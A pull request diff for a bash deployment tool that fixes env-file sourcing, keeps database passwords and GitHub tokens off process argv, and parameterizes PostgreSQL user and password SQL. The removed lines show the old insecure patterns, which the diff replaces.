### PR TITLE
fix(security): env-sourcing RCE, argv secret exposure, and gitignore gaps

### DIFF
--- a/lib/anonymize.sh
+++ b/lib/anonymize.sh
@@ -199,12 +199,22 @@ anon_apply_mysql() {
   sql=$(anon_build_sql "$config_file" "mysql")
 
   log "Applying anonymization rules to MySQL..."
-  # Pass the password via MYSQL_PWD (env var on the exec'd process) instead
-  # of --password=, which would put it in the container's process list.
-  echo "$sql" | $compose_cmd exec -T -e MYSQL_PWD="$mysql_password" mysql \
-    mysql -u "$mysql_user" "$mysql_db" 2>/dev/null \
-    && ok "MySQL anonymization complete" \
-    || { error "MySQL anonymization failed"; return 1; }
+  # Pass the password via MYSQL_PWD, exported locally and referenced bare
+  # (-e MYSQL_PWD, no =value) so it never appears as a literal argv token on
+  # either the host (the docker/compose exec process) or in the container
+  # (the mysql client process) — closes both `ps` surfaces. unset runs on
+  # both success and failure so the export never leaks into later calls.
+  export MYSQL_PWD="$mysql_password"
+  local mysql_result=0
+  echo "$sql" | $compose_cmd exec -T -e MYSQL_PWD mysql \
+    mysql -u "$mysql_user" "$mysql_db" 2>/dev/null || mysql_result=1
+  unset MYSQL_PWD
+  if [ "$mysql_result" -eq 0 ]; then
+    ok "MySQL anonymization complete"
+  else
+    error "MySQL anonymization failed"
+    return 1
+  fi
 }
 
 # anon_apply_sqlite <stack> <db_file> <config_file>

--- a/lib/backup.sh
+++ b/lib/backup.sh
@@ -880,9 +880,14 @@ _db_push_mysql() {
     local mysql_password="${MYSQL_ROOT_PASSWORD:-${MYSQL_PASSWORD:-}}"
 
     log "Restoring MySQL on VPS..."
-    if ssh $ssh_opts "$vps_user@$vps_host" \
-      "${_sudo}docker exec -i $mysql_container \
-        mysql -u $mysql_user --password=$mysql_password $mysql_db < $remote_dir/$filename"; then
+    # The password travels over ssh's stdin (never argv) — consumed by a
+    # remote `read` before the mysql restore's own `< $remote_dir/$filename`
+    # redirect takes over stdin for that command. This keeps the secret out
+    # of both the local ssh argv and the remote docker exec/mysql argv.
+    if printf '%s\n' "$mysql_password" | ssh $ssh_opts "$vps_user@$vps_host" \
+      "read -r MYSQL_PWD; export MYSQL_PWD; \
+        ${_sudo}docker exec -e MYSQL_PWD -i $mysql_container \
+        mysql -u $mysql_user $mysql_db < $remote_dir/$filename"; then
       ok "MySQL restore complete on VPS"
     else
       error "MySQL restore failed on VPS"

--- a/lib/backup/mysql.sh
+++ b/lib/backup/mysql.sh
@@ -46,31 +46,34 @@ backup_mysql() {
 
   log "Backing up MySQL → $out"
 
+  # MYSQL_PWD exported locally and referenced bare (-e MYSQL_PWD, no =value)
+  # so the password never appears as a literal argv token on the host (the
+  # docker/compose exec process) or in the container (the mysqldump process).
+  export MYSQL_PWD="$mysql_password"
+  local mysql_result=0
+
   # If container name is set, use docker exec directly (more reliable for
   # stacks where the compose service name differs from the container name)
   if [ -n "$mysql_container" ]; then
-    ${_sudo}docker exec "$mysql_container" \
-      mysqldump -u "$mysql_user" --password="$mysql_password" \
+    ${_sudo}docker exec -e MYSQL_PWD "$mysql_container" \
+      mysqldump -u "$mysql_user" \
       --single-transaction --routines --triggers --events \
-      "$mysql_db" >"$out" 2>/dev/null \
-      && ok "MySQL backup saved: $out" \
-      && create_backup_metadata "$stack" "$out" "mysql" "" \
-      || {
-        error "MySQL backup failed"
-        return 1
-      }
+      "$mysql_db" >"$out" 2>/dev/null || mysql_result=1
   else
     # Fallback: use compose exec with the configured mysql service name
-    ${_sudo}$compose_cmd exec -T "$mysql_service" \
-      mysqldump -u "$mysql_user" --password="$mysql_password" \
+    ${_sudo}$compose_cmd exec -T -e MYSQL_PWD "$mysql_service" \
+      mysqldump -u "$mysql_user" \
       --single-transaction --routines --triggers --events \
-      "$mysql_db" >"$out" 2>/dev/null \
-      && ok "MySQL backup saved: $out" \
-      && create_backup_metadata "$stack" "$out" "mysql" "" \
-      || {
-        error "MySQL backup failed"
-        return 1
-      }
+      "$mysql_db" >"$out" 2>/dev/null || mysql_result=1
+  fi
+  unset MYSQL_PWD
+
+  if [ "$mysql_result" -eq 0 ]; then
+    ok "MySQL backup saved: $out"
+    create_backup_metadata "$stack" "$out" "mysql" ""
+  else
+    error "MySQL backup failed"
+    return 1
   fi
 }
 
@@ -92,9 +95,7 @@ restore_mysql() {
 
     log "Restoring to target environment: $target_env"
     compose_cmd=$(resolve_compose_cmd "$stack" "$target_env_file" "")
-    set -a
-    source "$target_env_file"
-    set +a
+    safe_load_env "$target_env_file"
   fi
 
   local mysql_container="${MYSQL_CONTAINER_NAME:-}"
@@ -123,21 +124,21 @@ restore_mysql() {
 
   log "Restoring MySQL..."
 
+  export MYSQL_PWD="$mysql_password"
+  local mysql_result=0
   if [ -n "$mysql_container" ]; then
-    ${_sudo}docker exec -i "$mysql_container" \
-      mysql -u "$mysql_user" --password="$mysql_password" "$mysql_db" <"$sql_file" \
-      && ok "MySQL restore complete" \
-      || {
-        error "MySQL restore failed"
-        return 1
-      }
+    ${_sudo}docker exec -i -e MYSQL_PWD "$mysql_container" \
+      mysql -u "$mysql_user" "$mysql_db" <"$sql_file" || mysql_result=1
   else
-    ${_sudo}$compose_cmd exec -T "$mysql_service" \
-      mysql -u "$mysql_user" --password="$mysql_password" "$mysql_db" <"$sql_file" \
-      && ok "MySQL restore complete" \
-      || {
-        error "MySQL restore failed"
-        return 1
-      }
+    ${_sudo}$compose_cmd exec -T -e MYSQL_PWD "$mysql_service" \
+      mysql -u "$mysql_user" "$mysql_db" <"$sql_file" || mysql_result=1
+  fi
+  unset MYSQL_PWD
+
+  if [ "$mysql_result" -eq 0 ]; then
+    ok "MySQL restore complete"
+  else
+    error "MySQL restore failed"
+    return 1
   fi
 }

--- a/lib/backup/verify.sh
+++ b/lib/backup/verify.sh
@@ -366,42 +366,52 @@ verify_mysql_backup() {
   local mysql_password="${MYSQL_ROOT_PASSWORD:-${MYSQL_PASSWORD:-}}"
   local temp_db="verify_temp_$(date +%s)"
 
-  # Determine exec method
+  # Determine exec method (array, not string, so -e MYSQL_PWD can be inserted
+  # safely without relying on word-splitting). -e must precede the
+  # container/service name for both `docker exec` and `compose exec`.
   local mysql_service="${BACKUP_MYSQL_SERVICE:-mysql}"
-  local exec_prefix=""
+  local exec_prefix=()
   if [ -n "$mysql_container" ]; then
-    exec_prefix="docker exec -i $mysql_container"
+    exec_prefix=(docker exec -i -e MYSQL_PWD "$mysql_container")
   else
-    exec_prefix="$compose_cmd exec -T $mysql_service"
+    # shellcheck disable=SC2206 # intentional: compose_cmd may be "docker compose" (2 words)
+    exec_prefix=($compose_cmd exec -T -e MYSQL_PWD "$mysql_service")
   fi
+
+  # MYSQL_PWD exported locally so it never appears as a literal argv token on
+  # host or container.
+  export MYSQL_PWD="$mysql_password"
 
   # Create temporary database
   log "Creating temporary database: $temp_db" >&2
-  if ! $exec_prefix mysql -u "$mysql_user" --password="$mysql_password" \
+  if ! "${exec_prefix[@]}" mysql -u "$mysql_user" \
     -e "CREATE DATABASE \`$temp_db\`;" 2>/dev/null; then
     error "Failed to create temporary database"
+    unset MYSQL_PWD
     return 1
   fi
 
   # Restore backup to temporary database
   log "Restoring backup to temporary database..." >&2
-  if ! $exec_prefix mysql -u "$mysql_user" --password="$mysql_password" \
+  if ! "${exec_prefix[@]}" mysql -u "$mysql_user" \
     "$temp_db" <"$backup_file" 2>/dev/null; then
     error "Failed to restore backup to temporary database"
-    $exec_prefix mysql -u "$mysql_user" --password="$mysql_password" \
+    "${exec_prefix[@]}" mysql -u "$mysql_user" \
       -e "DROP DATABASE IF EXISTS \`$temp_db\`;" 2>/dev/null
+    unset MYSQL_PWD
     return 1
   fi
 
   # Get table count
   local table_count
-  table_count=$($exec_prefix mysql -u "$mysql_user" --password="$mysql_password" \
+  table_count=$("${exec_prefix[@]}" mysql -u "$mysql_user" \
     -N -e "SELECT COUNT(*) FROM information_schema.tables WHERE table_schema='$temp_db';" 2>/dev/null | tr -d ' ')
 
   # Cleanup
   log "Cleaning up temporary database..." >&2
-  $exec_prefix mysql -u "$mysql_user" --password="$mysql_password" \
+  "${exec_prefix[@]}" mysql -u "$mysql_user" \
     -e "DROP DATABASE IF EXISTS \`$temp_db\`;" 2>/dev/null
+  unset MYSQL_PWD
 
   local end_time
   end_time=$(date +%s)

--- a/lib/cmd_adopt.sh
+++ b/lib/cmd_adopt.sh
@@ -320,15 +320,15 @@ _adopt_bootstrap_checkout() {
       fi
       [[ "$clone_url" == *.git ]] || clone_url="${clone_url}.git"
       clone_url_q=$(_adopt_shell_quote "$clone_url")
-      # shellcheck disable=SC2029
-      ssh $ssh_opts "$user@$host" "
+      # PAT travels over ssh's stdin (never argv) — see remote_ssh_with_pat.
+      local clone_script="
         set -e
-        git clone \
-          -c 'url.https://oauth2:$gh_pat@github.com/.insteadOf=https://github.com/' \
-          -c 'url.https://oauth2:$gh_pat@github.com/.insteadOf=git@github.com:' \
+        git clone \$GIT_CRED_OPT \
           --branch $branch_q \
           $clone_url_q $deploy_dir_q
-      " || fail "Failed to clone repository. Check GH_PAT and repository access."
+      "
+      remote_ssh_with_pat "$ssh_opts" "$user@$host" "$gh_pat" "$clone_script" \
+        || fail "Failed to clone repository. Check GH_PAT and repository access."
     else
       setup_strut_repo "$user" "$host" "$port" "$ssh_key" "$repo_url" "$deploy_dir"
       # shellcheck disable=SC2029

--- a/lib/cmd_db.sh
+++ b/lib/cmd_db.sh
@@ -140,11 +140,15 @@ cmd_migrate_schema() {
       else
         migrate_cmd="python -m ch_ops.migrations.neo4j_migrator $migrate_action"
       fi
+      # NEO4J_PASSWORD exported locally and referenced bare (-e VAR, no
+      # =value) so it never appears as a literal argv token in the host's
+      # `docker run` process.
+      export NEO4J_PASSWORD="${NEO4J_PASSWORD}"
       docker run --rm --pull always \
         --network "$migrate_network" \
         -e NEO4J_URI="${NEO4J_URI}" \
         -e NEO4J_USER="${NEO4J_USER:-neo4j}" \
-        -e NEO4J_PASSWORD="${NEO4J_PASSWORD}" \
+        -e NEO4J_PASSWORD \
         -e STACK_NAME="${stack}" \
         -e DEPLOY_ENV="${deploy_env_value}" \
         "${MIGRATION_IMAGE:?MIGRATION_IMAGE must be set in env file or services.conf}" \
@@ -159,9 +163,13 @@ cmd_migrate_schema() {
       else
         postgres_migrate_cmd="python -m ch_ops.migrations.postgres_migrator $pg_action"
       fi
+      # DATABASE_URL carries POSTGRES_PASSWORD — export locally and reference
+      # bare (-e VAR, no =value) so it never appears as a literal argv token
+      # in the host's `docker run` process.
+      export DATABASE_URL="postgresql://${POSTGRES_USER}:${POSTGRES_PASSWORD}@postgres:5432/${POSTGRES_DB}"
       docker run --rm --pull always \
         --network "$migrate_network" \
-        -e DATABASE_URL="postgresql://${POSTGRES_USER}:${POSTGRES_PASSWORD}@postgres:5432/${POSTGRES_DB}" \
+        -e DATABASE_URL \
         -e STACK_NAME="${stack}" \
         -e DEPLOY_ENV="${deploy_env_value}" \
         "${MIGRATION_IMAGE:?MIGRATION_IMAGE must be set in env file or services.conf}" \

--- a/lib/cmd_doctor.sh
+++ b/lib/cmd_doctor.sh
@@ -230,8 +230,12 @@ _doc_check_vps() {
     local ssh_key=""
     ssh_key=$(grep -E '^VPS_SSH_KEY=' "$env_file" 2>/dev/null | head -1 | cut -d= -f2 | tr -d '"' | tr -d "'" | xargs)
 
-    local ssh_opts="-o StrictHostKeyChecking=no -o ConnectTimeout=5 -o BatchMode=yes"
-    [ -n "$ssh_key" ] && [ -f "$ssh_key" ] && ssh_opts="$ssh_opts -i $ssh_key"
+    local ssh_opts
+    if [ -n "$ssh_key" ] && [ -f "$ssh_key" ]; then
+      ssh_opts=$(build_ssh_opts -k "$ssh_key" -t 5 --batch)
+    else
+      ssh_opts=$(build_ssh_opts -t 5 --batch)
+    fi
 
     local vps_user=""
     vps_user=$(grep -E '^VPS_USER=' "$env_file" 2>/dev/null | head -1 | cut -d= -f2 | tr -d '"' | tr -d "'" | xargs)

--- a/lib/cmd_gateway.sh
+++ b/lib/cmd_gateway.sh
@@ -139,10 +139,8 @@ _gateway_deploy() {
 
   local ssh_opts
   ssh_opts=$(build_ssh_opts -p "$_GW_PORT" -k "$_GW_KEY" --batch)
-  # SCP uses -P (uppercase) for port, not -p like SSH
-  local scp_opts="-o StrictHostKeyChecking=no -o ConnectTimeout=10"
-  [[ -n "$_GW_PORT" && "$_GW_PORT" != "22" ]] && scp_opts="$scp_opts -P $_GW_PORT"
-  [[ -n "$_GW_KEY" ]] && scp_opts="$scp_opts -o IdentitiesOnly=yes -i $_GW_KEY"
+  local scp_opts
+  scp_opts=$(build_scp_opts -p "$_GW_PORT" -k "$_GW_KEY" --batch) || return 1
   local remote_path="${GATEWAY_CADDY_PATH:-/etc/caddy/Caddyfile}"
   local staging_path="/tmp/Caddyfile.new"
 

--- a/lib/cmd_init.sh
+++ b/lib/cmd_init.sh
@@ -88,7 +88,7 @@ EOF
   # NEVER truncate an existing .gitignore — it is the primary defense against
   # `git clean -fd` deleting untracked data dirs on deploy. Append a marker
   # block with only the rules that are missing.
-  local -a strut_ignores=('.env' '.env.*' '!.env.template' 'backups/' 'data/' '.rollback/' '.bluegreen')
+  local -a strut_ignores=('.env' '.env.*' '.*.env' '!.env.template' '*.backup-*' 'backups/' 'data/' '.rollback/' '.bluegreen')
   if [ ! -f "$PWD/.gitignore" ]; then
     {
       echo "# strut — generated .gitignore"

--- a/lib/cmd_remote_init.sh
+++ b/lib/cmd_remote_init.sh
@@ -184,15 +184,15 @@ Next step: remove the directory and re-run remote:init for a clean checkout:
     # Ensure .git suffix for clone
     [[ "$clone_url" == *.git ]] || clone_url="${clone_url}.git"
 
-    # shellcheck disable=SC2029
-    ssh $ssh_opts "$user@$host" "
+    # PAT travels over ssh's stdin (never argv) — see remote_ssh_with_pat.
+    local clone_script="
       set -e
-      git clone \
-        -c 'url.https://oauth2:$gh_pat@github.com/.insteadOf=https://github.com/' \
-        -c 'url.https://oauth2:$gh_pat@github.com/.insteadOf=git@github.com:' \
+      git clone \$GIT_CRED_OPT \
         --branch '$branch' \
         '$clone_url' '$deploy_dir'
-    " || fail "Failed to clone repository. Check GH_PAT and repository access."
+    "
+    remote_ssh_with_pat "$ssh_opts" "$user@$host" "$gh_pat" "$clone_script" \
+      || fail "Failed to clone repository. Check GH_PAT and repository access."
   else
     # No PAT — delegate to setup_strut_repo which handles interactive auth
     setup_strut_repo "$user" "$host" "$port" "$ssh_key" "$repo_url" "$deploy_dir"

--- a/lib/cmd_secrets.sh
+++ b/lib/cmd_secrets.sh
@@ -365,16 +365,8 @@ _secrets_push() {
 
   # Upload
   log "[1/3] Uploading env file..."
-  # Use scp with port flag (-P for scp, not -p)
-  local scp_opts="-o StrictHostKeyChecking=no -o ConnectTimeout=10"
-  [[ -n "$vps_port" && "$vps_port" != "22" ]] && scp_opts="$scp_opts -P $vps_port"
-  [[ -n "$vps_ssh_key" ]] && scp_opts="$scp_opts -o IdentitiesOnly=yes -i $vps_ssh_key"
-  # Add mux if enabled
-  if ssh_mux_enabled 2>/dev/null; then
-    local ctl_path
-    ctl_path=$(ssh_mux_control_path)
-    scp_opts="$scp_opts -o ControlMaster=auto -o ControlPath=$ctl_path -o ControlPersist=60s"
-  fi
+  local scp_opts
+  scp_opts=$(build_scp_opts -p "$vps_port" -k "$vps_ssh_key") || return 1
 
   # shellcheck disable=SC2086
   scp $scp_opts "$local_env" "$vps_user@$vps_host:$remote_path" || fail "Upload failed"
@@ -492,14 +484,8 @@ _secrets_pull() {
 
   # Download to temp file first, then atomically rename (prevents partial file on interrupt)
   log "Downloading..."
-  local scp_opts="-o StrictHostKeyChecking=no -o ConnectTimeout=10"
-  [[ -n "$vps_port" && "$vps_port" != "22" ]] && scp_opts="$scp_opts -P $vps_port"
-  [[ -n "$vps_ssh_key" ]] && scp_opts="$scp_opts -o IdentitiesOnly=yes -i $vps_ssh_key"
-  if ssh_mux_enabled 2>/dev/null; then
-    local ctl_path
-    ctl_path=$(ssh_mux_control_path)
-    scp_opts="$scp_opts -o ControlMaster=auto -o ControlPath=$ctl_path -o ControlPersist=60s"
-  fi
+  local scp_opts
+  scp_opts=$(build_scp_opts -p "$vps_port" -k "$vps_ssh_key") || return 1
 
   local tmp_pull
   tmp_pull=$(mktemp "${local_env}.XXXXXX") || fail "Could not create temp file"
@@ -571,14 +557,8 @@ _secrets_diff() {
   local tmp_remote
   tmp_remote=$(mktemp "${TMPDIR:-/tmp}/strut-secrets-diff-XXXXXX") || { fail "Could not create temp file"; return 1; }
   trap 'rm -f "$tmp_remote" 2>/dev/null' RETURN
-  local scp_opts="-o StrictHostKeyChecking=no -o ConnectTimeout=10"
-  [[ -n "$vps_port" && "$vps_port" != "22" ]] && scp_opts="$scp_opts -P $vps_port"
-  [[ -n "$vps_ssh_key" ]] && scp_opts="$scp_opts -o IdentitiesOnly=yes -i $vps_ssh_key"
-  if ssh_mux_enabled 2>/dev/null; then
-    local ctl_path
-    ctl_path=$(ssh_mux_control_path)
-    scp_opts="$scp_opts -o ControlMaster=auto -o ControlPath=$ctl_path -o ControlPersist=60s"
-  fi
+  local scp_opts
+  scp_opts=$(build_scp_opts -p "$vps_port" -k "$vps_ssh_key") || return 1
 
   # shellcheck disable=SC2086
   scp $scp_opts "$vps_user@$vps_host:$remote_path" "$tmp_remote" 2>/dev/null || {

--- a/lib/cmd_validate.sh
+++ b/lib/cmd_validate.sh
@@ -311,10 +311,8 @@ _validate_required_vars() {
     return
   fi
 
-  # Source env file to get values
-  set -a
-  source "$env_file" 2>/dev/null || true
-  set +a
+  # Parse env file to get values (safe_load_env: no shell execution of values)
+  safe_load_env "$env_file" 2>/dev/null || true
 
   while IFS= read -r var || [ -n "$var" ]; do
     var=$(echo "$var" | xargs)

--- a/lib/cmd_volumes.sh
+++ b/lib/cmd_volumes.sh
@@ -32,7 +32,7 @@ cmd_volumes() {
   validate_env_file "$env_file"
 
   local volume_conf="$stack_dir/volume.conf"
-  [ -f "$volume_conf" ] && source "$volume_conf"
+  [ -f "$volume_conf" ] && { safe_source_config "$volume_conf" || return 1; }
 
   case "$volume_action" in
     status)

--- a/lib/domain/cmd.sh
+++ b/lib/domain/cmd.sh
@@ -46,10 +46,8 @@ domain_command() {
   local ssh_opts
   ssh_opts=$(build_ssh_opts -p "$vps_port" -k "$vps_ssh_key" --batch)
 
-  # scp uses -P (uppercase) for port, not -p — build separate opts
-  local scp_opts="-o StrictHostKeyChecking=no -o ConnectTimeout=10 -o BatchMode=yes"
-  [ -n "$vps_port" ] && scp_opts="-P $vps_port $scp_opts"
-  [ -n "$vps_ssh_key" ] && scp_opts="$scp_opts -i $vps_ssh_key"
+  local scp_opts
+  scp_opts=$(build_scp_opts -p "$vps_port" -k "$vps_ssh_key" --batch) || return 1
 
   local proxy="${REVERSE_PROXY:-nginx}"
   local conf_local=""

--- a/lib/fleet.sh
+++ b/lib/fleet.sh
@@ -59,6 +59,7 @@ remote_ssh_with_pat() {
   local remote_script="$4"
 
   if [ -n "$gh_pat" ]; then
+    # shellcheck disable=SC2016 # intentional: these expand on the remote shell, not here
     local prelude='
       umask 077
       _cred_file=$(mktemp "${HOME}/.strut-git-cred-XXXXXX") || exit 1

--- a/lib/fleet.sh
+++ b/lib/fleet.sh
@@ -39,6 +39,44 @@ fleet_git_status_parse() {
   done
 }
 
+# remote_ssh_with_pat <ssh_opts> <target> <gh_pat> <remote_script>
+#
+# Runs <remote_script> on <target> over ssh, with git PAT auth wired up
+# without ever putting the token on any argv (local ssh argv, remote shell
+# argv, or git argv). If gh_pat is non-empty, the token travels over ssh's
+# stdin, gets written remotely to a mode-600 temp file consumed by git's
+# credential.helper, and is removed via a remote `trap ... EXIT` regardless
+# of outcome. If gh_pat is empty, <remote_script> runs as-is (no credential
+# setup, git falls back to whatever auth is already configured on the host).
+#
+# Inside <remote_script>, reference \$GIT_CRED_OPT (a remote shell var this
+# function defines — empty when gh_pat is empty) as extra args to git, e.g.:
+#   git \$GIT_CRED_OPT fetch origin
+remote_ssh_with_pat() {
+  local ssh_opts="$1"
+  local target="$2"
+  local gh_pat="$3"
+  local remote_script="$4"
+
+  if [ -n "$gh_pat" ]; then
+    local prelude='
+      umask 077
+      _cred_file=$(mktemp "${HOME}/.strut-git-cred-XXXXXX") || exit 1
+      trap '"'"'rm -f "$_cred_file"'"'"' EXIT
+      IFS= read -r _cred_line
+      printf "%s\n" "$_cred_line" > "$_cred_file"
+      GIT_CRED_OPT="-c credential.helper=store --file=$_cred_file"
+    '
+    # shellcheck disable=SC2029
+    printf 'https://oauth2:%s@github.com\n' "$gh_pat" | ssh $ssh_opts "$target" "$prelude
+$remote_script"
+  else
+    # shellcheck disable=SC2029
+    ssh $ssh_opts "$target" "GIT_CRED_OPT=''
+$remote_script"
+  fi
+}
+
 # fleet_git_status <user> <host> <port> <ssh_key> <deploy_dir> <branch> [gh_pat]
 #
 # SSHes into <host> and emits parseable key=value lines describing the git
@@ -67,9 +105,9 @@ fleet_git_status() {
   local ssh_opts
   ssh_opts=$(build_ssh_opts -p "$vps_port" -k "$vps_ssh_key" --batch)
 
-  # Intentional: variables expand locally before SSH
-  # shellcheck disable=SC2029
-  ssh $ssh_opts "$vps_user@$vps_host" "
+  # Intentional: variables (other than the PAT, which never touches this
+  # string — see remote_ssh_with_pat) expand locally before SSH
+  local remote_script="
     if [ ! -d '$deploy_dir' ]; then
       echo 'head_sha=missing'
       echo 'branch=unknown'
@@ -86,14 +124,7 @@ fleet_git_status() {
     cur_branch=\$(git rev-parse --abbrev-ref HEAD 2>/dev/null || echo 'unknown')
 
     _fetch_ok=true
-    if [ -n '$gh_pat' ]; then
-      git \
-        -c 'url.https://oauth2:$gh_pat@github.com/.insteadOf=https://github.com/' \
-        -c 'url.https://oauth2:$gh_pat@github.com/.insteadOf=git@github.com:' \
-        fetch origin 2>/dev/null || _fetch_ok=false
-    else
-      git fetch origin 2>/dev/null || _fetch_ok=false
-    fi
+    git \$GIT_CRED_OPT fetch origin 2>/dev/null || _fetch_ok=false
 
     if \$_fetch_ok; then
       behind=\$(git rev-list --count HEAD..origin/'$branch' 2>/dev/null || echo 0)
@@ -122,6 +153,8 @@ fleet_git_status() {
     echo \"dirty_files=\$dirty_files\"
     echo \"working_dir=\$working_dir\"
   "
+
+  remote_ssh_with_pat "$ssh_opts" "$vps_user@$vps_host" "$gh_pat" "$remote_script"
 }
 
 # fleet_sync <user> <host> <port> <ssh_key> <deploy_dir> <branch> <gh_pat> [opts]
@@ -175,9 +208,9 @@ fleet_sync() {
     return 0
   fi
 
-  # Intentional: variables expand locally before SSH
-  # shellcheck disable=SC2029
-  ssh $ssh_opts "$vps_user@$vps_host" "
+  # Intentional: variables (other than the PAT, which never touches this
+  # string — see remote_ssh_with_pat) expand locally before SSH
+  local remote_script="
     set -e
     if [ ! -d '$deploy_dir' ]; then
       echo 'ERROR: $deploy_dir not found on VPS' >&2
@@ -195,14 +228,7 @@ fleet_sync() {
     git log --oneline -1
 
     echo '--- Fetching origin ---'
-    if [ -n '$gh_pat' ]; then
-      git \\
-        -c 'url.https://oauth2:$gh_pat@github.com/.insteadOf=https://github.com/' \\
-        -c 'url.https://oauth2:$gh_pat@github.com/.insteadOf=git@github.com:' \\
-        fetch origin
-    else
-      git fetch origin
-    fi
+    git \$GIT_CRED_OPT fetch origin
 
     echo '--- Resetting to origin/$branch ---'
     git reset --hard 'origin/$branch'
@@ -227,6 +253,8 @@ fleet_sync() {
     echo '--- After sync ---'
     git log --oneline -1
   "
+
+  remote_ssh_with_pat "$ssh_opts" "$vps_user@$vps_host" "$gh_pat" "$remote_script"
 }
 
 # fleet_working_dir_check <deploy_dir> <stack> <container_working_dir>

--- a/lib/keys/db.sh
+++ b/lib/keys/db.sh
@@ -75,9 +75,7 @@ keys_db_rotate_postgres() {
   # Load env
   local env_file="$CLI_ROOT/.prod.env"
   [ -f "$env_file" ] || fail "Env file not found: $env_file"
-  set -a
-  source "$env_file"
-  set +a
+  safe_load_env "$env_file"
 
   local postgres_user="${POSTGRES_USER:-postgres}"
   local postgres_db="${POSTGRES_DB:-${POSTGRES_USER:-postgres}}"
@@ -133,9 +131,12 @@ keys_db_rotate_postgres() {
 
   log "Updating PostgreSQL password..."
 
-  # Update password in database
-  $compose_cmd exec -T postgres psql -U "$postgres_user" -d "$postgres_db" <<EOF
-ALTER USER $postgres_user WITH PASSWORD '$new_password';
+  # Update password in database (psql -v substitution avoids interpolating
+  # $postgres_user/$new_password directly into the SQL text)
+  $compose_cmd exec -T postgres psql -v ON_ERROR_STOP=1 \
+    -v pg_user="$postgres_user" -v pg_pass="$new_password" \
+    -U "$postgres_user" -d "$postgres_db" <<'EOF'
+ALTER USER :"pg_user" WITH PASSWORD :'pg_pass';
 EOF
 
   ok "PostgreSQL password updated in database"
@@ -148,8 +149,10 @@ EOF
   # never diverge, rather than leaving a new password nowhere on disk.
   if ! grep -qxF "POSTGRES_PASSWORD=$new_password" "$env_file"; then
     warn "Write to $env_file failed verification — reverting database password"
-    $compose_cmd exec -T postgres psql -U "$postgres_user" -d "$postgres_db" <<EOF || true
-ALTER USER $postgres_user WITH PASSWORD '$old_password';
+    $compose_cmd exec -T postgres psql -v ON_ERROR_STOP=1 \
+      -v pg_user="$postgres_user" -v pg_pass="$old_password" \
+      -U "$postgres_user" -d "$postgres_db" <<'EOF' || true
+ALTER USER :"pg_user" WITH PASSWORD :'pg_pass';
 EOF
     cp "$backup_file" "$env_file"
     fail "Aborting: password write to $env_file failed verification — database password reverted, see backup: $backup_file"
@@ -199,9 +202,7 @@ keys_db_create_readonly() {
   # Load env
   local env_file="$CLI_ROOT/.prod.env"
   [ -f "$env_file" ] || fail "Env file not found: $env_file"
-  set -a
-  source "$env_file"
-  set +a
+  safe_load_env "$env_file"
 
   local postgres_user="${POSTGRES_USER:-postgres}"
   local postgres_db="${POSTGRES_DB:-${POSTGRES_USER:-postgres}}"
@@ -216,22 +217,25 @@ keys_db_create_readonly() {
 
   log "Creating PostgreSQL read-only user..."
 
-  # Create user and grant permissions
-  $compose_cmd exec -T postgres psql -U "$postgres_user" -d "$postgres_db" <<EOF
+  # Create user and grant permissions (psql -v substitution avoids
+  # interpolating $username/$password/$postgres_db directly into the SQL text)
+  $compose_cmd exec -T postgres psql -v ON_ERROR_STOP=1 \
+    -v ro_user="$username" -v ro_pass="$password" -v db_name="$postgres_db" \
+    -U "$postgres_user" -d "$postgres_db" <<'EOF'
 -- Create user
-CREATE USER $username WITH PASSWORD '$password';
+CREATE USER :"ro_user" WITH PASSWORD :'ro_pass';
 
 -- Grant connect
-GRANT CONNECT ON DATABASE $postgres_db TO $username;
+GRANT CONNECT ON DATABASE :"db_name" TO :"ro_user";
 
 -- Grant usage on schema
-GRANT USAGE ON SCHEMA public TO $username;
+GRANT USAGE ON SCHEMA public TO :"ro_user";
 
 -- Grant select on all tables
-GRANT SELECT ON ALL TABLES IN SCHEMA public TO $username;
+GRANT SELECT ON ALL TABLES IN SCHEMA public TO :"ro_user";
 
 -- Grant select on future tables
-ALTER DEFAULT PRIVILEGES IN SCHEMA public GRANT SELECT ON TABLES TO $username;
+ALTER DEFAULT PRIVILEGES IN SCHEMA public GRANT SELECT ON TABLES TO :"ro_user";
 EOF
 
   ok "PostgreSQL read-only user created"

--- a/lib/keys/discovery.sh
+++ b/lib/keys/discovery.sh
@@ -156,9 +156,7 @@ discover_vps_keys() {
     return
   fi
 
-  set -a
-  source "$env_file"
-  set +a
+  safe_load_env "$env_file"
 
   local vps_host="${VPS_HOST:-}"
   local vps_user="${VPS_USER:-ubuntu}"

--- a/lib/keys/github.sh
+++ b/lib/keys/github.sh
@@ -171,14 +171,15 @@ keys_github_rotate_vps_key() {
   log "Step 3: Testing new key..."
 
   # Load VPS connection info
-  set -a
-  source "$env_file"
-  set +a
+  safe_load_env "$env_file"
 
   local vps_host="${VPS_HOST:-}"
   local vps_user="${VPS_USER:-ubuntu}"
 
-  if ssh -i "$private_key" -o StrictHostKeyChecking=no -o ConnectTimeout=5 "$vps_user@$vps_host" "echo 'SSH test successful'" &>/dev/null; then
+  local ssh_opts
+  ssh_opts=$(build_ssh_opts -k "$private_key" -t 5 --batch)
+  # shellcheck disable=SC2086
+  if ssh $ssh_opts "$vps_user@$vps_host" "echo 'SSH test successful'" &>/dev/null; then
     ok "New key works!"
   else
     warn "Could not verify new key - please test manually"
@@ -295,9 +296,7 @@ keys_github_sync() {
   )
 
   # Load env file
-  set -a
-  source "$env_file"
-  set +a
+  safe_load_env "$env_file"
 
   local synced=0
   for var in "${sync_vars[@]}"; do

--- a/lib/keys/pull.sh
+++ b/lib/keys/pull.sh
@@ -104,9 +104,7 @@ keys_pull_from_vps() {
     fail "Environment file not found: $env_file"
   fi
 
-  set -a
-  source "$env_file"
-  set +a
+  safe_load_env "$env_file"
 
   local vps_host="${VPS_HOST:-}"
   local vps_user="${VPS_USER:-ubuntu}"
@@ -254,9 +252,7 @@ keys_pull_from_containers() {
     fail "Environment file not found: $env_file"
   fi
 
-  set -a
-  source "$env_file"
-  set +a
+  safe_load_env "$env_file"
 
   local vps_host="${VPS_HOST:-}"
   local vps_user="${VPS_USER:-ubuntu}"

--- a/lib/keys/registry.sh
+++ b/lib/keys/registry.sh
@@ -75,10 +75,7 @@ keys_registry_rotate() {
   # Load VPS credentials from env file
   local vps_host="" vps_user="ubuntu" vps_ssh_key="" vps_port="22"
   if [ -f "$env_file" ]; then
-    set -a
-    # shellcheck source=/dev/null
-    source "$env_file"
-    set +a
+    safe_load_env "$env_file"
     vps_host="${VPS_HOST:-}"
     vps_user="${VPS_USER:-ubuntu}"
     vps_ssh_key="${VPS_SSH_KEY:-}"
@@ -253,10 +250,7 @@ keys_registry_status() {
 
